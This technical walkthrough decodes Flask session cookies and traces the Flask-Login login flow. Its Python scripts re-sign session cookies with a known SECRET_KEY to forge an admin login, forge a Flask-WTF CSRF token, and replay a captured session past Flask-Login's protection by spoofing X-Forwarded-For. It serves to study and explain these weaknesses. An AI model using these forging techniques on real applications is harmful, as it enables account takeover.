Decoding the Flask session and a study of the flask_login login process


#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Decode a Flask session cookie with the application's SECRET_KEY. Flask signs the
# cookie with itsdangerous using the salt 'cookie-session', HMAC key derivation and
# SHA-1, so building the serializer with the same parameters reproduces it.
from itsdangerous import URLSafeTimedSerializer
from flask.sessions import TaggedJSONSerializer
import hashlib

s = URLSafeTimedSerializer(
    'some_random_key', 'cookie-session',
    serializer=TaggedJSONSerializer(),
    signer_kwargs={'key_derivation': 'hmac', 'digest_method': hashlib.sha1},
)
result = s.loads('.eJytkkFv4jAQhf_KymcOxLSHReohUVg30noiUBLvuEIoCSmOY1OJQAmu-O91aFW19z1ZGr_3ed6M38jm2ZS9anoyf3ojv44fR0XmpBT3tjo_PJDr5LOSs8HgPzAJG14lNafkcfWasD8aaeHqSzQtmXHJY6QkzU_kur75vgHrWfEh_QEV4neQMKW2Nt-hLUzVRn1Ft3splrtS3P0fUDUrpn93o3p9XU_Ipt2S-adNxvWU6y6QejcDhxRdSNNMae4iAywPOC06sPkAMZ65Tc7goOVaGdDhkGboQNcUdH4GVhi0iwu62teV5QwHtHgBtwhQJ05afpeKlfW6FrPIooXWt2mlxgEcD0Ag5Y77HgrLM6-OO8rZksqY3_MsUjxejmFJ3R-eN8eXrtl_RQANejSj4xTFYpA66vxTOo3DAV2hUx9DarCoPdYZhWPc8DY70vbh1raedTycmgk59c3hi7sUq6NfwU03XuxL24wf42a4vgOsyrm7.DJDfoQ.lPf6Vla0QXeI1yOYs0riql1Lywk')
print('Decoded:', result)

Output (captured under Python 2, hence the u'' prefixes):

Decoded: {u'username': u'admin', u'csrf_token': '1b5037f10f247e0f8076145220db705b0baaaac5', u'user_id': u'1', u'_flashes': [('info', 'Please login to access this page.'), ('success', 'You have been logged in.')], u'_fresh': True, u'isAdmin': True, u'user': 'Admin', u'_id': 'c758c876c082eb509c0d1b6cf7de18daf4bd77a1d61b10ab0e32fec6dfc2efe7594c7aae02b4f96cc887ed2f1dc4d0ba58cc8cba97205abda3944e51c44b0727'}

1. The username must stay consistent with user_id: Flask-Login loads the user from user_id, and username is just another value the application stored in the session.

2. _id is computed from the real source IP (the first X-Forwarded-For entry, falling back to the socket address) and the User-Agent request header. Both values are supplied by the client unless a trusted proxy rewrites X-Forwarded-For, so this is a device fingerprint, not an authentication factor.
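Both observations come down to one fact: the cookie is signed, never encrypted, and signing needs nothing but SECRET_KEY. The script below is an added example (not code from the post, from Flask or from itsdangerous) that re-implements the scheme Flask configures in itsdangerous' URLSafeTimedSerializer with the standard library only, so the format can be read, checked and re-signed without either library installed. The key 'some_random_key' and the session contents in the demo are the post's values or constructed; the 'django-concat' branch exists because Flask-WTF's CSRF token, covered later on the page, uses itsdangerous' default signer with the salt 'wtf-csrf-token'.

```python
"""Flask session cookie: read, verify and re-sign with the standard library.

Added example (not code from the post, Flask or itsdangerous). Format:
[.]base64url(JSON, zlib-compressed when "." is present) "." base64url(timestamp)
"." base64url(HMAC-SHA1), signing key = HMAC-SHA1(SECRET_KEY, salt).
"""
import base64
import hashlib
import hmac
import json
import time
import zlib

SESSION_SALT = b"cookie-session"  # Flask's SecureCookieSessionInterface.salt


def _b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64d(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def derive_key(secret_key, salt, key_derivation="hmac"):
    """Per-salt signing key. Flask's session uses "hmac"; itsdangerous' own default,
    which Flask-WTF's CSRF token (salt b"wtf-csrf-token") uses, is "django-concat"."""
    if key_derivation == "hmac":
        return hmac.new(secret_key, salt, hashlib.sha1).digest()
    if key_derivation == "django-concat":
        return hashlib.sha1(salt + b"signer" + secret_key).digest()
    raise ValueError("unknown key derivation: %s" % key_derivation)


def _tag(obj):
    """TaggedJSONSerializer subset: tuples (the _flashes entries) become {" t": [...]}."""
    if isinstance(obj, tuple):
        return {" t": [_tag(v) for v in obj]}
    if isinstance(obj, dict):
        return {k: _tag(v) for k, v in obj.items()}
    if isinstance(obj, list):
        return [_tag(v) for v in obj]
    return obj


def _untag(obj):
    if isinstance(obj, dict):
        if len(obj) == 1 and " t" in obj:
            return tuple(_untag(v) for v in obj[" t"])
        return {k: _untag(v) for k, v in obj.items()}
    if isinstance(obj, list):
        return [_untag(v) for v in obj]
    return obj


def decode_payload(cookie):
    """Read the session WITHOUT checking the signature: signed, not encrypted."""
    compressed = cookie.startswith(".")
    raw = _b64d(cookie.lstrip(".").split(".")[0])
    if compressed:
        raw = zlib.decompress(raw)
    return _untag(json.loads(raw))


def verify(cookie, secret_key, salt=SESSION_SALT, max_age=None, key_derivation="hmac"):
    """Check the HMAC over "<payload>.<timestamp>", then the age. Returns (data, timestamp)."""
    signed_part, sig = cookie.rsplit(".", 1)
    key = derive_key(secret_key.encode(), salt, key_derivation)
    expected = _b64e(hmac.new(key, signed_part.encode(), hashlib.sha1).digest())
    if not hmac.compare_digest(expected, sig):
        raise ValueError("bad signature")
    timestamp = int.from_bytes(_b64d(signed_part.rsplit(".", 1)[1]), "big")
    # Recent itsdangerous stores the Unix time; the release used in the post stored
    # seconds since 2011-01-01 (add 1293840000 to read its cookies' timestamps).
    if max_age is not None and time.time() - timestamp > max_age:
        raise ValueError("signature expired")
    return decode_payload(cookie), timestamp


def sign(data, secret_key, salt=SESSION_SALT, timestamp=None, key_derivation="hmac"):
    """Build a cookie the server accepts for `data`. Only SECRET_KEY is needed,
    which is why a leaked key is equivalent to a login as any user_id."""
    raw = json.dumps(_tag(data), separators=(",", ":")).encode("utf8")
    packed = zlib.compress(raw)
    payload = "." + _b64e(packed) if len(packed) < len(raw) - 1 else _b64e(raw)
    timestamp = int(time.time()) if timestamp is None else timestamp
    ts_bytes = timestamp.to_bytes((timestamp.bit_length() + 7) // 8, "big")
    signed_part = payload + "." + _b64e(ts_bytes)
    key = derive_key(secret_key.encode(), salt, key_derivation)
    return signed_part + "." + _b64e(hmac.new(key, signed_part.encode(), hashlib.sha1).digest())


if __name__ == "__main__":
    # Constructed session forged for user_id "1" with the post's key.
    forged = sign({"user_id": "1", "_fresh": True, "isAdmin": True}, "some_random_key")
    print(forged)
    print(verify(forged, "some_random_key", max_age=3600))
```

With max_age left at None the age check is skipped, so verify() applied to the cookie from the first listing with the post's key checks its signature; only the timestamp value needs the 2011 offset for cookies from that itsdangerous release. Note that verify() says nothing about session['_id']: that comparison is done by Flask-Login's session protection, not by the cookie signature.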

1. Tracing the Flask login process with the method above

The first request for a protected page is redirected to the login page, and that response sets this cookie:

.eJyrVopPy0kszkgtVrKKrlZSKIFQSUpWSonhprlJ5ba2SrU6UJFQ94qcyAi_HE_3irIoo5xST4-gMk93t6xIo7Cq5Eong0T3nCpPD6eMKKPQUqXaWCAEAJf8Hr4.DJI1lQ.hSLLzh_2xt_KwRnPRdox-OubPnY

Decoded: {u'_flashes': [('info', 'Please login to access this page.')]}

The browser follows the Location header, sending back the cookie from the previous response; this time the server's response sets the cookie to:

.eJwtjk8LgjAcQL9K_M4ebNFF8CLm3MFBwVpbiKhoMmdB_pl_8LtX5OnBOzzeAkmp07YqWnDuC-y6PzJwIOXHJjOuC6u1GYZHLW5UEzwOEumehJeB4EAJdJ3zybNTrGcSepVErIc1XmML8vZdJt2rLp7gbJWIk33kRwepTkYqYlPEvnwYOouR-myKlFcLlRvKiRFNUAkeKHr-fawfC9Q4-A.DJI1lg.gTTZ5CnOXOokNA32I021cxkx_DA

Decoded: {u'csrf_token': '1b5037f10f247e0f8076145220db705b0baaaac5', u'_flashes': [('info', 'Please login to access this page.')]}

Compared to the previous cookie, csrf_token has been added; it is the value Flask-WTF checks against the token in the login form when the form is submitted.


The token is handled as follows:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Flask-WTF signs the CSRF token with the same SECRET_KEY but the salt
# 'wtf-csrf-token' and itsdangerous' default signer, so no signer_kwargs here.
from itsdangerous import URLSafeTimedSerializer
import hashlib

s = URLSafeTimedSerializer('some_random_key', 'wtf-csrf-token')
token = 'IjY2NDg0MThjZDI3ZTMxOWNhZmExOGI1Y2E5OTI5NDYzOTM1YThkYjAi.DJO3Cw.D4WB4eYBUB6LOcZxY_tur12Ay0Q'
# max_age=3600 is Flask-WTF's default WTF_CSRF_TIME_LIMIT; an older token raises
# SignatureExpired, so drop max_age to inspect one after the fact.
a = s.loads(token, max_age=3600)
print('Decoded:', a)
print('*' * 100)

# The decoded value is the sha1 hex digest stored in session['csrf_token'];
# signing it again yields a token the server accepts for that session.
token = '6648418cd27e319cafa18b5ca9929463935a8db0'
token_forged = s.dumps(token)
print('Forged token:', token_forged)

print('#' * 100)
# Flask-Login's session['_id']: sha512 of "<client IP>|<User-Agent>"
base = '127.0.0.1|Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'
h = hashlib.sha512()
h.update(base.encode('utf8'))
print('Device fingerprint:', h.hexdigest())


session['_id'] = _create_identifier(): Flask-Login hashes the client's IP|User-Agent string with hashlib.sha512 and stores the digest as the visitor's device fingerprint. Session protection compares it on every request: with SESSION_PROTECTION = 'strong' a mismatch discards the login, with 'basic' (the default) it only marks the session as not fresh, so login_required still passes and only fresh_login_required is blocked.
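To see what the fingerprint actually buys, here is an added example (not Flask-Login's code) that models _create_identifier and the session-protection decision Flask-Login takes on each request. `headers` and `peer_ip` stand in for flask.request, the addresses and the User-Agent are constructed, and `py3_repr` is a switch added here for the Python 3 form described in its docstring; the session keys follow the post's cookie (user_id), while Flask-Login 0.5 and later store _user_id instead.

```python
"""Flask-Login's session fingerprint and what session protection does with it.

Added example, not Flask-Login's code. `headers`/`peer_ip` stand in for
flask.request; addresses and the User-Agent are constructed.
"""
import hashlib

UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36")
# Keys dropped in "strong" mode. The post's cookie uses "user_id"; Flask-Login 0.5+
# stores "_user_id" (the check itself is unchanged).
SESSION_KEYS = ("user_id", "_id", "_fresh", "_remember", "_remember_seconds", "next")


def remote_addr(headers, peer_ip):
    """Mirror of Flask-Login's _get_remote_addr: the first X-Forwarded-For entry,
    else the socket peer. Unless a trusted proxy overwrites the header, the client
    chooses this value."""
    address = headers.get("X-Forwarded-For", peer_ip)
    return address.split(",")[0].strip()


def fingerprint(ip, user_agent, py3_repr=False):
    """session["_id"]: sha512 of "<ip>|<user-agent>".

    The post hashes the plain string (Python 2). Under Python 3 Flask-Login formats
    the two values as bytes objects, so the hashed text reads "b'<ip>'|b'<ua>'";
    check _create_identifier in the installed version before relying on either form.
    """
    if py3_repr:
        ua = None if user_agent is None else user_agent.encode("utf8")
        base = "%s|%s" % (ip.encode("utf8"), ua)
    else:
        base = "%s|%s" % (ip, user_agent)
    return hashlib.sha512(base.encode("utf8")).hexdigest()


def identifier(headers, peer_ip, py3_repr=False):
    return fingerprint(remote_addr(headers, peer_ip), headers.get("User-Agent"), py3_repr)


def session_protection(sess, ident, mode="strong", permanent=False):
    """Flask-Login's per-request check. Returns True when the login was discarded."""
    if mode not in ("basic", "strong"):
        return False                      # protection disabled
    if sess and ident != sess.get("_id"):
        if mode == "basic" or permanent:
            sess["_fresh"] = False        # still logged in; only fresh_login_required blocks
            return False
        for key in SESSION_KEYS:          # strong: drop the login entirely
            sess.pop(key, None)
        sess["_remember"] = "clear"       # and ask for the remember cookie to be cleared
        return True
    return False


def replay(stolen, headers, peer_ip, mode):
    """Present a captured session from the client described by headers/peer_ip."""
    sess = dict(stolen)
    failed = session_protection(sess, identifier(headers, peer_ip), mode)
    return sess, failed


if __name__ == "__main__":
    victim = {"user_id": "1", "_fresh": True, "_id": fingerprint("203.0.113.5", UA)}
    # Same cookie from another address: strong mode logs the user out,
    # basic mode only clears the "fresh" flag.
    for mode in ("strong", "basic"):
        print(mode, replay(victim, {"User-Agent": UA}, "198.51.100.9", mode))
    # Attacker puts the victim's address in X-Forwarded-For: the fingerprint matches.
    spoof = {"User-Agent": UA, "X-Forwarded-For": "203.0.113.5"}
    print("spoofed", replay(victim, spoof, "198.51.100.9", "strong"))
```

The replay with X-Forwarded-For set is the practical caveat: unless a trusted reverse proxy rewrites that header, both inputs to the fingerprint are chosen by the client, so against someone who holds SECRET_KEY, or a stolen cookie plus the victim's address and User-Agent, session protection is a speed bump rather than a barrier.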


